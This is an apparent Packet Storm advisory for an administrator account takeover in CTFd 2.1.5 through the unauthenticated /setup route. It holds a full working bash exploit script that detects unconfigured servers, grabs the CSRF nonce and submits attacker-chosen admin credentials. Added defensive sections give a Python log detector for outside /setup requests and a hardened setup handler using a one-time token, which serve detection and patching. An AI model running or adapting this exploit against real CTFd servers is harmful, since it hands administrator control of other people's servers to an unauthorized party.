CTFd 2.1.5 Administrator Account Takeover

🗓️ 02 Jan 2020 · Reported by Social Engineering Neo · Type: packetstorm · 🔗 packetstormsecurity.com

CTFd 2.1.5 Administrator Account Takeover vulnerability by Social Engineering Neo. A remote attacker can modify server configurations during the initial setup. Classified as Improper Authorization (CWE-285) and Direct Request / Forced Browsing (CWE-425).
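The window described here (anyone who reaches `/setup` before the operator submits the form can claim the administrator account) leaves a clear trace in the web server's access log: requests to `/setup` from a source other than the operator. The following is an added detection example, not part of the advisory or of CTFd; the combined-log-format sample lines, the trusted CIDR range and the severity labels are constructed for illustration.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed sample lines in combined log format (not taken from the advisory):
# 10.0.0.5 is the operator performing setup from the LAN; 203.0.113.77 is an
# outside host that reaches /setup in the window before the operator submits.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Jan/2020:10:00:01 +0000] "GET /setup HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.77 - - [02/Jan/2020:10:00:20 +0000] "GET /setup HTTP/1.1" 200 5123 "-" "curl/7.64.1"
203.0.113.77 - - [02/Jan/2020:10:00:25 +0000] "POST /setup HTTP/1.1" 302 0 "-" "curl/7.64.1"
203.0.113.77 - - [02/Jan/2020:10:00:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/7.64.1"
10.0.0.5 - - [02/Jan/2020:10:00:40 +0000] "POST /setup HTTP/1.1" 200 4811 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Jan/2020:10:01:00 +0000] "GET /admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)


@dataclass
class SetupHit:
    ip: str
    ts: str
    method: str
    status: int
    ua: str
    severity: str


def find_setup_hits(log_text, trusted_cidrs=("10.0.0.0/8",)):
    """Return every request to /setup that did not come from a trusted range.

    A GET shows that someone found the unconfigured instance; a POST means they
    submitted the setup form and, if the instance was still unconfigured at that
    moment, they now control the administrator account.
    """
    nets = [ip_network(c) for c in trusted_cidrs]
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        # Normalise the path: drop the query string and a trailing slash.
        if m["path"].split("?", 1)[0].rstrip("/") != "/setup":
            continue
        src = ip_address(m["ip"])
        if any(src in n for n in nets):
            continue  # the operator's own setup traffic
        hits.append(SetupHit(m["ip"], m["ts"], m["method"], int(m["status"]), m["ua"],
                             "high" if m["method"] == "POST" else "medium"))
    return hits


if __name__ == "__main__":
    for hit in find_setup_hits(SAMPLE_LOG):
        print(f"[{hit.severity}] {hit.ts} {hit.ip} {hit.method} /setup -> {hit.status} ({hit.ua})")
```

Run against the sample, the function reports the outside host's GET (medium) and POST (high) and ignores the operator's own traffic; a POST hit that precedes the operator's own POST is the signature of the takeover this advisory describes, and the `/login` that follows it from the same address is the attacker using the credentials they just set.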

Code

```text
# Exploit Title: CTFd Administrator Account Takeover
# Date: 2/1/20
# Exploit Author: Social Engineering Neo - @EngineeringNeo
# Vendor Homepage: https://ctfd.io
# Software Link: https://github.com/CTFd/CTFd/releases/tag/2.1.5
# Version: CTFd Local/Remote Hosting 2.1.5 and below
# Tested on: CTFd 2.1.5
```

CTFd Server Administrator Account Takeover Vulnerability by Social Engineering Neo.

Tested On: -
Live Remote Hosted CTFd v2.1.5 Server.
Local Hosted CTFd v2.1.5 Server.
Windows
MacOS
Linux

Class: -
Improper Authorization - CWE-285

Base: -
Direct Request 'Forced Browsing' - CWE-425

Summary: -
Due to missing authorization checks and direct-request protections, newly created CTFd servers are open to a "full" administrator account takeover during the setup process. This covers the given URL prior to and during setup, until the setup form is saved.

Short Description: -
A remote attacker with knowledge of the new CTFd hostname could modify critical configurations of the server. This is only possible while the server admin is performing the initial setup.

Proof of Concept: -
####
VICTIM - (Server Admin)
1.) - Setting up the CTFd server configuration as usual.

ATTACKER
1.) - Knowledge of the newly created CTFd hostname.
2.) - Access https://[HOST].ctfd.io to verify the server is up.
3.) - Access https://[HOST].ctfd.io/setup to set/modify the server administrator password, username and email - no authentication/authorization is required to input these values.
4.) - Log in with the new admin credentials at https://[HOST].ctfd.io/login
####

CODE: - (BASH)
####

```bash
#!/bin/bash

clear
read -p "Enter Target Address Followed by Port: " target port # e.g. localhost 8080

if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
    # Downloaded to check <title>, <h1> and nonce values.
    curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' "http://$target:$port/setup" > preexp
else
    echo "Incorrect Port."
    exit 1
fi

titleCheck=$(grep '<title>CTFd</title>' preexp)  # If the server is not configured, the default <title> value is 'CTFd' until the admin changes it
headerOneCheck=$(grep '<h1>Setup</h1>' preexp)   # Because the admin could also name the server 'CTFd', the <h1> value 'Setup' is checked as well
nonce=$(grep 'var csrf_nonce' preexp | awk '{print $4}' | sed 's/.//;s/..$//')  # This nonce is tied to the cookie value 'session=00000000-0000-0000-0000-000000000000' sent above, so don't worry ;)
rm preexp

# Pattern match tolerates the leading whitespace grep keeps from the HTML line
if [[ "$titleCheck" == *"<title>CTFd</title>"* ]] && [[ "$headerOneCheck" == *"<h1>Setup</h1>"* ]]; then
    read -p "Target is Vulnerable, Would you Like to Attack? (Y/n): " attack
    if [ "$attack" = 'y' ] || [ "$attack" = 'Y' ]; then
        clear
        read -p 'CTF Name: ' ctfName              # Name for the CTF
        read -p 'Admin Username: ' adminName      # Username for the administration account
        read -p 'Admin Email: ' adminEmail        # Email address for the administration account
        read -p 'Admin Password: ' adminPassword  # Password for the administration account
        read -p 'User Mode (teams/users): ' userMode  # Whether users join teams to play (Team Mode) or play as themselves (User Mode)
        clear

        echo Working on it...
        # Send the previously entered values to $target
        curl --silent -i -X POST -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' --data "nonce=$nonce&ctf_name=$ctfName&name=$adminName&email=$adminEmail&password=$adminPassword&user_mode=$userMode" "http://$target:$port/setup"
        clear
        echo Attack Executed!

        # Verify successful exploit
        curl --silent -H 'Cookie: session=00000000-0000-0000-0000-000000000000' -b 'session=00000000-0000-0000-0000-000000000000' "http://$target:$port/setup" > postexp
        titleCheck=$(grep '<title>CTFd</title>' postexp)
        headerOneCheck=$(grep '<h1>Setup</h1>' postexp)
        rm postexp

        # Values should now be different from what we started with pre-setup
        if [[ "$titleCheck" == *"<title>CTFd</title>"* ]] && [[ "$headerOneCheck" == *"<h1>Setup</h1>"* ]]; then
            clear
            echo Something went Wrong, Try Again.
        else
            clear
            echo "CTFd Server Hosted @ $target has been Compromised :)"
        fi
    fi
else
    echo "Target does not appear to be in the setup state."
fi
```

####
[ADMIN USER TAKEOVER SUCCESSFUL]
####

VIDEO: - https://youtu.be/li9dX7CUTTg *Exploit*
: - https://youtu.be/bQyVyXzvHCo *Demo*

Expected Result: -
Users should not have the ability to read/write critical server/user configuration without proper authentication.

Observed Result: -
Unauthorized users have the ability to read/write critical server/user configuration without any authentication.
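The Expected Result stated in the advisory (no read/write of critical configuration without proper authentication) can be expressed as a handler-level authorization check on the setup route. What follows is an added Python illustration of the flaw's shape beside one hardened form; it is neither CTFd's code nor the vendor's fix. The in-memory `ServerState`, the one-time setup token shown to the operator out of band, and the placeholder form values are assumptions made for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Constructed form submission with placeholder values (not from the advisory).
SAMPLE_FORM = {
    "ctf_name": "Example CTF",
    "name": "admin",
    "email": "admin@example.invalid",
    "password": "placeholder-password",
    "user_mode": "users",
}
REQUIRED_FIELDS = ("ctf_name", "name", "email", "password", "user_mode")


@dataclass
class ServerState:
    """Minimal stand-in for the application's persisted configuration (assumed)."""
    setup_complete: bool = False
    ctf_name: Optional[str] = None
    admin_name: Optional[str] = None
    # Hypothetical mitigation: a one-time secret generated at first start and
    # shown only out of band (server console or environment), never in the page.
    setup_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


def vulnerable_setup(state: ServerState, form: dict):
    """Shape of the flaw in the advisory: the only gate is 'not configured yet',
    so whoever reaches /setup first chooses the administrator credentials."""
    if state.setup_complete:
        return 403, "setup already completed"
    state.ctf_name = form["ctf_name"]
    state.admin_name = form["name"]
    state.setup_complete = True
    return 302, "/login"


def hardened_setup(state: ServerState, form: dict, presented_token: Optional[str]):
    """Same handler with authorization bound to an out-of-band secret."""
    if state.setup_complete:
        return 404, "not found"  # the route disappears once configured
    # Constant-time comparison so the token cannot be guessed byte by byte;
    # encode to bytes so non-ASCII input cannot raise instead of failing closed.
    if presented_token is None or not hmac.compare_digest(
        presented_token.encode("utf-8"), state.setup_token.encode("utf-8")
    ):
        return 403, "invalid or missing setup token"
    missing = [k for k in REQUIRED_FIELDS if not form.get(k)]
    if missing:
        return 400, "missing fields: " + ", ".join(missing)
    if form["user_mode"] not in ("teams", "users"):
        return 400, "user_mode must be 'teams' or 'users'"
    state.ctf_name = form["ctf_name"]
    state.admin_name = form["name"]
    state.setup_complete = True
    return 302, "/login"


if __name__ == "__main__":
    weak = ServerState()
    print("vulnerable, anonymous POST:", vulnerable_setup(weak, SAMPLE_FORM))
    strong = ServerState()
    print("hardened, no token:        ", hardened_setup(strong, SAMPLE_FORM, None))
    print("hardened, correct token:   ", hardened_setup(strong, SAMPLE_FORM, strong.setup_token))
    print("hardened, second attempt:  ", hardened_setup(strong, SAMPLE_FORM, strong.setup_token))
```

The design point is that "the instance is not configured yet" is a state, not an identity: it says nothing about who is submitting the form. Binding the first submission to a secret that only the operator can see (or, equivalently, completing setup before the instance is reachable from the network) closes the window the advisory describes, and returning 404 afterwards removes the route as a target for forced browsing.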
